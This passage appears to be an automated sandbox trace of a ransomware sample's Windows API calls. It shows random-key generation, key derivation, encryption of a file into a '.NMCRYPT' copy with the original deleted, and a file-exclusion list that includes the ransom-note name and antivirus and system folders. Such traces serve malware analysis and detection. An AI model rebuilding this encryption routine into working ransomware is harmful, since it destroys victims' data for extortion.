hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.047] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.048] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.048] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.048] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.048] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.048] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.048] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.048] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.048] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.048] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.048] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.048] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.048] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.048] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.048] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.048] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.048] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.048] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.048] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.048] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.048] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.048] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.048] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.048] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.048] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0157.048] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0157.049] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44483c | out: phHash=0x1d44483c) returned 1 [0157.049] CryptHashData (hHash=0x9ad778, pbData=0x2d7dd10, dwDataLen=0x100, dwFlags=0x0) returned 1 [0157.049] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad778, dwFlags=0x4, phKey=0x1d444840 | out: phKey=0x1d444840*=0x9ad278) returned 1 [0157.049] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x1, pbData=0x2d7de10, dwFlags=0x0) returned 1 [0157.049] CryptSetKeyParam (hKey=0x9ad278, dwParam=0x4, pbData=0x2d7dcc0*=0x1, dwFlags=0x0) returned 1 [0157.049] wcslen (_String="\\\\?\\") returned 0x4 [0157.049] CryptDuplicateKey (in: hKey=0x9ad278, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7dc94 | out: phKey=0x2d7dc94*=0x9ad4b8) returned 1 [0157.049] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0157.049] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0157.049] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7dc84 | out: lpFileSize=0x2d7dc84*=488) returned 1 [0157.049] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7dc7c*=0x200, lpOverlapped=0x0) returned 1 [0157.050] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.051] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.051] GetLastError () returned 0x0 [0157.051] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.052] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0xe8, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0xe8, lpOverlapped=0x0) returned 1 [0157.052] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0xe8, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0xf0) returned 1 [0157.052] GetLastError () returned 0x0 [0157.052] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0xf0, lpOverlapped=0x0) returned 1 [0157.052] ReadFile (in: hFile=0x1624, lpBuffer=0x607e18, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesRead=0x2d7dc80*=0x0, lpOverlapped=0x0) returned 1 [0157.052] WriteFile (in: hFile=0x588, lpBuffer=0x607e18*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x607e18*, lpNumberOfBytesWritten=0x2d7dc7c*=0x0, lpOverlapped=0x0) returned 1 [0157.052] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml")) returned 0x20 [0157.052] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml", dwFileAttributes=0x20) returned 0 [0157.052] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 1 [0157.052] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml")) returned 0 [0157.053] wcscpy (in: _Dest=0x2d7d7d4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml" [0157.053] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main") returned 1 [0157.053] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7d9dc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD8B4.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd8b4.tmp")) returned 0xd8b4 [0157.053] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD8B4.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd8b4.tmp"), dwFlags=0x1) returned 0 [0157.053] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD8B4.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd8b4.tmp")) returned 1 [0157.054] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0157.054] wcslen (_String="OK") returned 0x2 [0157.054] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.054] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.054] CryptDestroyKey (hKey=0x9ad278) returned 1 [0157.054] CryptDestroyHash (hHash=0x9ad778) returned 1 [0157.054] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0157.054] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*NMCRYPT") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*Recovers your files.html") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*.exe") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*.dll") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*.lnk") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*.bat") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*.ini") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*.msi") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*.scf") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*pagefile.sys*") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*NTUSER.DAT*") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*AppData*") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*\\winrar\\*") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*\\java\\*") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*\\windows\\*") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*\\ESET\\*") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*\\AVG\\*") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*\\AVIRA\\*") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*Atheros*") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*Realtek*") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*bootmgr*") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*boot*") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*boot*") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*CONFIG.SYS*") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*IO.SYS*") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*MSDOS.SYS*") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*NTDETECT.COM*") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*ntldr*") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*chrome*") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*opera*") returned 0 [0157.054] PathMatchSpecW (pszFile="base_rtl.xml", pszSpec="*firefox*") returned 0 [0157.055] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml", pszSpec="*") returned 1 [0157.055] strlen (_Str="NMoreira") returned 0x8 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 